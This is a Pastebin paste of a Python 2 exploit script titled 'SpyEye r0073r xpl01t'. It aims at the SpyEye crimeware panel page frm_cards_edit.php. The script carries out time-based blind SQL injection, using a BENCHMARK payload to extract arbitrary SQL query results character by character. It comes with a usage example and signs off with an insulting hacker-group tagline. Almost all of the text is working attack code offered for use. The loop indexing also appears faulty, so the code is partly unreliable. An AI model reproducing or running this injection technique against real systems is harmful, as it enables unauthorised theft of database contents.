Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from httplib import HTTPConnection
- from time import time
- from sys import exit, argv, stdout
- import urllib
- print """
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
- 0 __ __ __ __ 1
- 1 /'__`\ /'__`\/\ \__ /'__`\ 0
- 0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1
- 1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0
- 0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1
- 1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0
- 0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1
- 1 0
- 0 1
- 1 >> SpyEye r0073r xpl01t 0
- 0 >> author : Sanjar Satsura 1
- 1 >> sanjar[at]xakep[dot]ru 0
- 0 >> Public v.0.1 1
- 1 >> )c( 2011 0
- 0 1
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
- Example:
- Spyeye_r0073r <host>/dir/"version()"
- """
- if len(argv)<=3: exit()
- else: print "[+]Started pwn..."
- host = argv[1]
- path = argv[2]
- sql = argv[3]
- port = 80
- hash = ""
- full = []
- for k in range(48,122):
- full.append(k)
- full.append(0)
- # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
- # This is the charset to try
- delay = 0.5
- a=1
- while a <= 32:
- for i in full:
- j = 0
- if i == 0: exit('\n[+]Finished\n')
- #
- start = time()
- # start time for the delay
- conn = HTTPConnection(host,port)
- #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
- values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
- data = urllib.urlencode(values)
- print data
- conn.request("GET", path + "frm_cards_edit.php?" + data )
- response = conn.getresponse()
- read = response.read()
- print read
- if response.status == 404: exit('[+]404')
- #404
- now = time()
- if now - start > delay:
- #has come true then the character is valid
- stdout.write(chr(i))
- stdout.flush()
- hash += chr(i)
- a += 1
- break;
- else: j += 1
- print "i vale %s, y J vale %s" %(i,j)
- # w4tch u. h4ck u. fuck u. 1337day
- # www.r00tw0rm.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement